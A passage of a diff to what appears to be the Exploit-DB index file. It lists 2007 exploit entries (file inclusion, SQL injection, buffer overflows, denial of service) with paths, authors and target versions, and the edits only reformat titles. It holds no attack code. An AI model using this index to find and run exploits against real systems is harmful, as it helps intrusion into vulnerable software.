(Windows)",2007-03-20,GoLd_M,php,webapps,0 +3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 (Windows) - Local File Inclusion Exploit",2007-03-19,bd0rk,php,webapps,0 +3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion Exploit",2007-03-20,GoLd_M,php,webapps,0 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 3525,platforms/linux/local/3525.php,"PHP 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service",2007-03-20,MADYNES,hardware,dos,0 -3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service (Win32)",2007-03-20,mu-b,windows,dos,0 +3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows/x86) - Remote Denial of Service",2007-03-20,mu-b,windows,dos,0 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 - (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 3529,platforms/linux/local/3529.php,"PHP 5.2.1 - hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3530,platforms/php/webapps/3530.pl,"Monster Top List 1.4.2 - (functions.php root_path) Remote File Inclusion Exploit",2007-03-20,fluffy_bunny,php,webapps,0 @@ -3235,7 +3235,7 @@ id,file,description,date,author,platform,type,port 3571,platforms/linux/local/3571.php,"PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z - Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 -3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 - Remote Buffer Overflow (windows)",2007-03-25,Heretic2,windows,remote,0 +3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer Overflow",2007-03-25,Heretic2,windows,remote,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local,0 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,anonymous,windows,remote,0 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0 @@ -3259,7 +3259,7 @@ id,file,description,date,author,platform,type,port 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - (header.php) Remote File Inclusion",2007-03-28,GoLd_M,php,webapps,0 3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - (view.php id) SQL Injection",2007-03-28,ajann,php,webapps,0 3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - (quotes.php) Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 -3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 beta 2 - (phpbb_root_path) Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 +3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - (phpbb_root_path) Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - (inc/lang.php) Local File Inclusion Exploit",2007-03-29,GoLd_M,php,webapps,0 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 @@ -3269,13 +3269,13 @@ id,file,description,date,author,platform,type,port 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Denial of Service Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0 3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Inclusion",2007-03-29,"ThE dE@Th",php,webapps,0 3608,platforms/php/webapps/3608.txt,"Advanced Login 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 -3609,platforms/linux/remote/3609.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Linux)",2007-03-30,"Winny Thomas",linux,remote,0 +3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0 3611,platforms/php/webapps/3611.txt,"JC URLshrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository - (viewcat.php) SQL Injection",2007-03-30,ajann,php,webapps,0 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 -3615,platforms/linux/remote/3615.c,"dproxy-nexgen - Remote Root Buffer Overflow (Linux x86)",2007-03-30,mu-b,linux,remote,53 +3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow",2007-03-30,mu-b,linux,remote,53 3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Pre-Authenticated Remote Exploit",2007-03-31,muts,windows,remote,143 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow",2007-03-31,devcode,windows,local,0 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - 'index.php' SQL Injection",2007-03-31,ajann,php,webapps,0 @@ -3313,7 +3313,7 @@ id,file,description,date,author,platform,type,port 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution Exploit",2007-04-03,DarkFig,php,webapps,0 3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution Exploit",2007-04-03,"Isma Khan",multiple,remote,0 3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog 2.52 - (postid) Blind SQL Injection",2007-04-03,ajann,php,webapps,0 -3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - (xmlrpc) SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0 +3656,platforms/php/webapps/3656.pl,"Wordpress 2.1.2 - (xmlrpc) SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0 3657,platforms/php/webapps/3657.txt,"MySpeach 3.0.7 - Remote / Local File Inclusion",2007-04-03,Xst3nZ,php,webapps,0 3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion",2007-04-04,kezzap66345,php,webapps,0 @@ -3326,7 +3326,7 @@ id,file,description,date,author,platform,type,port 3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - (visit.php) SQL Injection",2007-04-04,ajann,php,webapps,0 3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 -3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion",2007-04-05,bd0rk,php,webapps,0 +3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusion",2007-04-05,bd0rk,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 3671,platforms/php/webapps/3671.php,"phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs 2.4 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 @@ -3337,7 +3337,7 @@ id,file,description,date,author,platform,type,port 3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 - (download2.php fn1) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 3678,platforms/php/webapps/3678.php,"SmodBIP 1.06 - (aktualnosci zoom) SQL Injection",2007-04-06,Kacper,php,webapps,0 3679,platforms/php/webapps/3679.php,"SmodCMS 2.10 - (Slownik ssid) SQL Injection",2007-04-06,Kacper,php,webapps,0 -3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite - Off-by-one Remote Overflow (Win32)",2007-04-07,axis,windows,remote,80 +3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite (Windows/x86) - Off-by-one Remote Overflow",2007-04-07,axis,windows,remote,80 3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 - (smilies.php config) Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] Local File Inclusion Exploit",2007-04-08,bd0rk,php,webapps,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service",2007-04-08,Marsu,windows,dos,0 @@ -3360,7 +3360,7 @@ id,file,description,date,author,platform,type,port 3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution Exploit",2007-04-10,BlackHawk,php,webapps,0 3703,platforms/php/webapps/3703.txt,"Joomla/Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 -3704,platforms/php/webapps/3704.txt,"pl-php beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 +3704,platforms/php/webapps/3704.txt,"pl-php Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0 3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - (absolute_path) Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 @@ -3390,7 +3390,7 @@ id,file,description,date,author,platform,type,port 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"joomla module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 -3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 +3735,platforms/php/webapps/3735.txt,"LS Simple GuestBook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"mambo/joomla component article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139 3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow Exploit",2007-04-15,rgod,windows,remote,80 @@ -3469,27 +3469,27 @@ id,file,description,date,author,platform,type,port 3811,platforms/windows/local/3811.c,"IrfanView 4.00 - (.iff) Buffer Overflow",2007-04-27,Marsu,windows,local,0 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - (.png) Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 -3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 +3814,platforms/php/webapps/3814.txt,"Wordpress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 3816,platforms/php/webapps/3816.php,"TCExam 4.0.011 - (SessionUserLang) Shell Injection Exploit",2007-04-29,rgod,php,webapps,0 3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - (fileview.php album) Local File Inclusion",2007-04-29,DNX,php,webapps,0 3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - (index.php show) Remote File Inclusion Exploit",2007-04-29,kezzap66345,php,webapps,0 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - (.ra) Remote Denial of Service",2007-04-30,n00b,windows,dos,0 3820,platforms/php/webapps/3820.php,"psipuss 1.0 - (editusers.php) Remote Change Admin Password Exploit",2007-04-30,Dj7xpl,php,webapps,0 -3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g - proxy.c logurl() Remote Buffer Overflow (linux)",2007-04-30,vade79,linux,remote,0 -3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g - proxy.c logurl() Remote Buffer Overflow (Win32)",2007-04-30,vade79,windows,remote,0 +3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0 +3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g (Windows/x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,windows,remote,0 3823,platforms/windows/local/3823.c,"Winamp 5.34 - (.mp4) Code Execution Exploit",2007-04-30,Marsu,windows,local,0 -3824,platforms/php/webapps/3824.txt,"WordPress Plugin wp-Table 1.43 - (inc_dir) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 -3825,platforms/php/webapps/3825.txt,"WordPress Plugin wordTube 1.43 - (wpPATH) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 +3824,platforms/php/webapps/3824.txt,"Wordpress Plugin wp-Table 1.43 - (inc_dir) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 +3825,platforms/php/webapps/3825.txt,"Wordpress Plugin wordTube 1.43 - (wpPATH) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service",2007-05-01,shinnai,windows,dos,0 3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0 -3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 +3828,platforms/php/webapps/3828.txt,"Wordpress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service",2007-05-02,shinnai,windows,dos,0 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - (download.php item) Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion Exploit",2007-05-02,bd0rk,php,webapps,0 -3834,platforms/php/webapps/3834.php,"YaPIG 0.95b - Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 +3834,platforms/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 3836,platforms/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service",2007-05-03,shinnai,windows,dos,0 3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 @@ -3512,7 +3512,7 @@ id,file,description,date,author,platform,type,port 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3855,platforms/php/webapps/3855.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)",2007-05-04,Gu1ll4um3r0m41n,php,webapps,0 3856,platforms/windows/local/3856.htm,"East Wind Software - (advdaudio.ocx 1.5.1.1) Local Buffer Overflow Exploit",2007-05-05,shinnai,windows,local,0 -3857,platforms/php/webapps/3857.txt,"vm watermark for gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 +3857,platforms/php/webapps/3857.txt,"vm watermark for Gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 3858,platforms/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution Exploit",2007-05-05,DarkFig,php,webapps,0 3859,platforms/php/webapps/3859.txt,"Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass",2007-05-05,Dj7xpl,php,webapps,0 3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 - (cms2.php s_dir) Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 @@ -3543,7 +3543,7 @@ id,file,description,date,author,platform,type,port 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection",2007-05-09,Silentz,php,webapps,0 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection",2007-05-09,Silentz,php,webapps,0 -3888,platforms/windows/local/3888.c,"Gimp 2.2.14 - (.ras) Download/Execute Buffer Overflow (Win32)",2007-05-09,"Kristian Hermansen",windows,local,0 +3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Windows/x86) - (.ras) Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - RControl.dll Denial of Service",2007-05-10,shinnai,windows,dos,0 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 @@ -3565,7 +3565,7 @@ id,file,description,date,author,platform,type,port 3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 - (splash.lang.php) Remote File Inclusion",2007-05-12,"ThE TiGeR",php,webapps,0 3910,platforms/windows/dos/3910.html,"PrecisionID Barcode ActiveX 1.3 - Denial of Service",2007-05-12,shinnai,windows,dos,0 3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 - 'id' SQL Injection",2007-05-14,CyberGhost,php,webapps,0 -3912,platforms/windows/local/3912.c,"notepad++ 4.1 - .ruby file processing Buffer Overflow (Win32)",2007-05-12,vade79,windows,local,0 +3912,platforms/windows/local/3912.c,"Notepad++ 4.1 (Windows/x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,windows,local,0 3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - (GET Request) Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080 3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - (archshow.asp var) SQL Injection",2007-05-13,gsy,asp,webapps,0 3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) Remote File Inclusion",2007-05-13,Mogatil,php,webapps,0 @@ -3597,7 +3597,7 @@ id,file,description,date,author,platform,type,port 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - (print.php newnr) SQL Injection",2007-05-16,Silentz,php,webapps,0 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0 -3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 +3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 3945,platforms/linux/dos/3945.rb,"MagicISO 5.4 (build239) - (.cue) Heap Overflow PoC",2007-05-17,n00b,linux,dos,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion",2007-05-17,"Alkomandoz Hacker",php,webapps,0 @@ -3613,7 +3613,7 @@ id,file,description,date,author,platform,type,port 3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro 3.25 - Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro 3.25 - Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 -3960,platforms/php/webapps/3960.php,"WordPress 2.1.3 - admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 +3960,platforms/php/webapps/3960.php,"Wordpress 2.1.3 - admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 3961,platforms/windows/remote/3961.html,"LeadTools Raster Variant - (LTRVR14e.dll) Remote File Overwrite",2007-05-21,shinnai,windows,remote,0 3962,platforms/php/webapps/3962.txt,"Ol Bookmarks Manager 0.7.4 - (root) Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0 3963,platforms/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0 @@ -3638,7 +3638,7 @@ id,file,description,date,author,platform,type,port 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow Exploit",2007-05-24,rgod,windows,remote,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion",2007-05-24,DeltahackingTEAM,php,webapps,0 3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow Exploit",2007-05-25,rgod,windows,remote,0 -3985,platforms/osx/local/3985.txt,"Mac OS X 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 +3985,platforms/osx/local/3985.txt,"Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 3986,platforms/windows/dos/3986.html,"LeadTools Raster - Dialog File_D Object Remote Buffer Overflow",2007-05-25,shinnai,windows,dos,0 3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution Exploit",2007-05-25,Silentz,php,webapps,0 @@ -3666,7 +3666,7 @@ id,file,description,date,author,platform,type,port 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 4011,platforms/windows/dos/4011.html,"LeadTools Raster ISIS Object (LTRIS14e.DLL 14.5.0.44) - Remote Buffer Overflow",2007-05-30,shinnai,windows,dos,0 4012,platforms/windows/dos/4012.html,"LeadTools Raster OCR Document Object Library - Memory Corruption Exploit",2007-05-30,shinnai,windows,dos,0 -4013,platforms/osx/local/4013.txt,"Mac OS X < 2007-005 - (vpnd) Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local,0 +4013,platforms/osx/local/4013.txt,"Mac OSX < 2007-005 - (vpnd) Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local,0 4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote SEH Overwrite",2007-05-30,h07,windows,remote,0 4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - (MjpegDecoder.dll 2.0.0.13) Remote Exploit",2007-05-31,rgod,windows,remote,0 4016,platforms/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass Exploit",2007-05-31,Sha0,windows,remote,0 @@ -3691,7 +3691,7 @@ id,file,description,date,author,platform,type,port 4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - index.php 'epi' SQL Injection (2)",2007-06-06,Silentz,php,webapps,0 4038,platforms/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos,0 -4039,platforms/php/webapps/4039.txt,"WordPress 2.2 - (xmlrpc.php) SQL Injection",2007-06-06,Slappter,php,webapps,0 +4039,platforms/php/webapps/4039.txt,"Wordpress 2.2 - (xmlrpc.php) SQL Injection",2007-06-06,Slappter,php,webapps,0 4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - SQL Injection",2007-06-06,kerem125,asp,webapps,0 4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion Exploit",2007-06-07,GoLd_M,php,webapps,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow",2007-06-07,Excepti0n,windows,remote,0 @@ -3699,7 +3699,7 @@ id,file,description,date,author,platform,type,port 4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service",2007-06-07,Kad,windows,dos,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows - Animated Cursor Stack Overflow",2007-06-07,"RISE Security",windows,remote,0 4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos,0 -4047,platforms/windows/dos/4047.c,"SafeNET High Assurance Remote 1.4.0 - (IPSecDrv.sys) Remote Denial of Service",2007-06-08,mu-b,windows,dos,0 +4047,platforms/windows/dos/4047.c,"SafeNet High Assurance Remote 1.4.0 - (IPSecDrv.sys) Remote Denial of Service",2007-06-08,mu-b,windows,dos,0 4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods Exploit",2007-06-08,shinnai,windows,remote,0 4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker - ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local,0 @@ -3761,7 +3761,7 @@ id,file,description,date,author,platform,type,port 4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 4111,platforms/php/webapps/4111.txt,"phpSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0 -4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 +4113,platforms/php/webapps/4113.pl,"Wordpress 2.2 - (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 4114,platforms/php/webapps/4114.txt,"elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0 4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - (lang) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4116,platforms/php/webapps/4116.txt,"QuickTicket 